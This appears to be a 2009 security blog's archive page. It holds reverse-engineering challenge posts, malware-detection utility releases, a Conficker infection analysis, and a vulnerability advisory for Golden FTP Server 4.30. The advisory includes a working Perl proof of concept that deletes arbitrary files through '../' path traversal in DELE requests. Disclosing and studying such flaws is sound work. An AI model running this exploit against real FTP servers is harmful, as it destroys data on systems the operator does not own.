RCE Challenge – nine
by sharpe on Dec.20, 2009, under Reverse Code Engineering
My last reverseme was too easy due to the nature of the code de-obfuscation key length and usage. This time I have made some minor changes to precisely this portion of the code. Furthermore, I have added some anti-debugging stuff that I observed in a piece of malware. I hope you enjoy.
Here is a screen dump of this reverseme:
It can be downloaded here.
Golden FTP Server File Deletion Vulnerability
by sharpe on Nov.18, 2009, under Security, Vulnerabilities
I wrote to the vendor on the 11th of November but have heard nothing so here we are.
An input validation error exists in the way FTP “DELE” requests are handled. This can be exploited to escape the FTP root and delete arbitrary files by using the “../” character sequence.
Successful exploitation of the vulnerability requires that the “Enable full control” option is enabled.
The vulnerability is confirmed in version 4.30 Free and Professional.
Here is a brief PoC:
use strict;
use Net::FTP
my $ftp = Net::FTP->new(“192.168.1.35″, Debug => 1) || die $@;
$ftp->login(“anonymous”, ‘anonymous@local.host’) || die $ftp->message;
# The FTP root is, via the configuration, set to C:\ftp\public
$ftp->cwd(“/public/”) || die $ftp->message;
# This deletes the file C:\bollocks.txt
$ftp->delete(“../../bollocks.txt”);
$ftp->quit;
$ftp = undef;
Ref:
- http://www.exploit-db.com/exploits/10258
- http://xforce.iss.net/xforce/xfdb/54497
FISH Version 0.0.3 Beta Released
by sharpe on Aug.31, 2009, under Malware, Security, Utilities
FISH version 0.0.3 beta with numerous improvements is now available for download. Expect to see trememdous performance increases in this release as well as many other improvements including the following:
Version 0.0.3 (second public release):
- This version is at least 30 times faster than version 0.0.2
- Implemented a new hash function
- Optimised the iterative function used to iterate files
- Time stamps are now included in database files as well as reports
- It is now possible to limit file selection to a specific size (calculating the digest of a 7GB vm image is a really bad idea)
- Restructured database files
- Restructured report files
- Introduced more logging to ensure that the user knows exactly which files were skipped (if they are too big according to the configuration)
If you find any bugs or have any ideas for improvement, please don’t hesiate to let me know.
FISH can be downloaded here. This is still a beta release so use at your own risk.
Identifying Vulnerabilities in ActiveX Controls
by sharpe on Aug.08, 2009, under Reverse Code Engineering, Security
While many ActiveX components are slowly being replaced with technologies considered more secure and/or web-mature, many developers still utililise ActiveX controls as a quick way to push advanced functionality out to web browsers. ActiveX security is based on digital signatures, if you trust the source of the component then it is safe to run the control. That said, when the control is run, it runs like any other Win32 desktop application and has access to the same resources, unlike Java, which executes inside a safe environment known as a “sandbox”, thus limiting what the Applet has access to. Well that’s how the sandbox works in theory at least. In other words, you better trust the authors of the ActiveX component.
In this paper, I won’t be focussing on the ActiveX security model, but rather on the identification of vulnerabilities in the ActiveX control itself, not in the way the control interacts with its environment. This is an interesting topic, as the presence of such vulnerabilities could enable malicious individuals to compromise a user’s computer, simply by guiding them to a malicious web site. In other words, no actions, on the part of the user, are required for remote code execution.
This paper is currently being re-written and thus unavailable.
If you have any comments, please don’t hesitate to write to me.
That said, when the control is run, it runs like any other Win32 desktop application and has access to the same resources, unlike Java, which executes inside a safe environment known as a “sandbox”, thus limiting what the Applet has access to. Well that’s how the sandbox works in theory at least. In other words, you better trust the authors of the ActiveX component.
“Default User” Temporary Internet File weirdness
by sharpe on Jul.27, 2009, under Malware, Security
The other day I was looking at a friend’s computer. I was browsing his user profile directory in search of something intersting to show him and came across something that I had never seen before; the Default User’s Temporary Internet Files directory was filled with temporary Internet files (hence its name 
) as though this user had been using Internet Explorer to browse the Internet, which is not possible when using Windows normally. Furthermore, he mentioned that his anti-virus (Trend Micro Officescan: TM) identified the file “C:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5\SN8PI1DA\raedwev[1].jpg” as WORM_DOWNAD.DAM. According to the file extension it was an image (JPG), but the content of the file appeared to be binary in nature. I uploaded the file to VirusTotal but the results came back blank.
A couple of hours later I came to the conclusion that another computer had probably attempted to infect his computer with the Conficker worm by exploiting the vulnerability described in MS08-067. This assumption was based on the presence of the mentioned file in the default user’s (Default User) Temporary Internet Files directory.
The default user is used as a template for new users and it is not possible to log on as this user. If the temporary Internet files directory does become populated with cache files, it may be because Internet Explorer had, at some point, been executed with SYSTEM user privileges (browse the Internet using Internet Explorer with SYSTEM privileges and you’ll see what I mean, which is a really bad idea). Usually, when a user uses Internet Explorer, it will run with the same privileges as that user. That is, if Internet Explorer is running with SYSTEM rights, it is somewhat unusual and therefore probably malicious.
Assuming that my friend’s computer is vulnerable to the MS08-067 vulnerability (it was), if an attempt to exploit this vulnerability is successful, this could (depending on the exploit payload) result in a new process with SYSTEM privileges. The Conficker worm (WORM_DOWNAD) spreads by exploiting MS08-067, which results in the UrlDownloadToFileA() API in Urlmon.dll being called with SYSTEM privileges in order to download additional files (configurations, payloads, etc.). When this newly created SYSTEM process calls the UrlDownloadToFileA() API in the Urlmon.dll, which can be said to be one of Internet Explorer’s core components, it is as if Internet Explorer itself is being used to retrieve the file. This means that any files downloaded in this way will be written to Internet Explorer’s Temporary Internet Files directory before reaching their final destination (typically the currently logged on user’s desktop).
While the Conficker payload was being downloaded, my friend’s anti-virus was able to identify the malicious payload and thus interrupt the download process prior to its completion, which is what caused TM to issue the initial alert. Additionally, the reason TM identified the file as WORM_DOWNAD.DAM is due to the fact that the payload had not successfully/completely been downloaded and was thus damaged, hence the name issued by TM: WORM_DOWNAD.DAM (DAM for damaged).
If you see temporary internet files in the Default User’s Temporary Internet Files directory, you may want to have a closer look. Hiding malicious payloads in TMP and JPG files (among others) is common play for malware, so keep an eye out for these. Check out NASTI (below), which will help you identify the presence of such files.
I hope you found this interesting.
Special anniversary greets to divine dinne.
NASTI – Nickos And Sharpes Tool for Identifying potencially malicious files
by sharpe on Jun.12, 2009, under Malware, Security, Utilities
Recently whilst analysing the PSP2-BBB banker trojan, I discovered that this particular trojan, as well as many others, downloaded malicious payloads to the currently logged on user’s “Temp” and “Temporary Internet Files” directories, located in the “Local Settings” directory, on a Win32 system, and saved them as temp files with a random four character name plus the .TMP extension (e.g. 23D4.TMP). Knowing this, it would be nice to be able to identify executable files with inconsistent file extensions (e.g. executable files with .TMP as the file extension), as this would aid in the identification of potentially malicious files and thus speed up the analysis.
For the sake of illustration, if we look at one of the examined TMP files in a hex editor (presented in the following screen dump), we can clearly see that it is a valid Portable Executable (PE) file:
NASTI’s configuration enables the user to specify signatures for known file types and associate file extensions to this signature. When NASTI runs, it compares the current file’s extension with those supplied in the configuration file. If they do not match, then the signature should not be present in the file. If it is, the file is flagged.
Here is a screen dump of NASTI in the middle of a scan:
NASTI can be downloaded here. This is a beta release so use at your own risk.
IFAU – Index Frequency Analysis Utility
by sharpe on Jun.04, 2009, under Reverse Code Engineering, Utilities
IFAU is a simple utility that was written to analyse binary files and count how many times each hex byte is present in a given file. This is useful when attempting to identify frequently used op codes. The results are written to a hash which is dumped to an XML report as well as a graph upon completion.
A sample XML report might resemble the following:
<?xml version=”1.0″ encoding=”iso-8859-1″ ?>
<bytes count=”10″>
<byte value=”11″ count=”1″ />
<byte value=”23″ count=”1″ />
<byte value=”32″ count=”1″ />
<byte value=”38″ count=”1″ />
<byte value=”4a” count=”1″ />
<byte value=”69″ count=”1″ />
<byte value=”87″ count=”2″ />
<byte value=”ad” count=”1″ />
<byte value=”df” count=”1″ />
<byte value=”fa” count=”1″ />
</bytes>
As mentioned above, this information is also presented in a graph. A large number of different bytes can result in the graph being difficult to read, which is why the previously presented XML report is also generated.
As an illustration, a graph for a small binary file might resemble the following:
IFAU can be downloaded here. This is a beta release so use at your own risk.
RCE Challenge – eight
by sharpe on Jun.04, 2009, under Reverse Code Engineering
Based on all the comments I have received on the previous two unlockmes (six and seven), I have created a new and improved version, which I will hope will offer more of a challenge than its predecessors. If you manage to find a valid Unlock Code, type it in and press the Unlock Code button. If it is correct, you should be able to find the hidden secret.
Here is a screen dump of this unlockme challenge:
It can be downloaded here.
RCE Challenge – seven
by sharpe on Jun.03, 2009, under Reverse Code Engineering
Here is my latest crackme, which is no longer a keygenme. I decided to drop that functionality as I feel that finding a valid Unlock Code for the code obfuscation is the only real challenge. If you manage to find a valid Unlock Code, type it in and press the Unlock Code button. If it is correct, things should go well when you press the Check button.
Here is a screen dump of this unlockme challenge:
It can be downloaded here.
RCE Challenge – six
by sharpe on May.25, 2009, under Reverse Code Engineering
All sorts of stuff is obfuscated here, including the serial-generation code as well as other “code” that may be of interest. I won’t say much more. After the unlock code has been found, type it in and it will de-obfuscate the serial generation code as with the two other challenges. If you enter an invalid code, the crackme will crash, as the de-obfuscation routine will contain garbage instruction sequences. After this bit has been complete it should be straight forward.
Here is a screen dump of this keygenme:
It can be downloaded here.
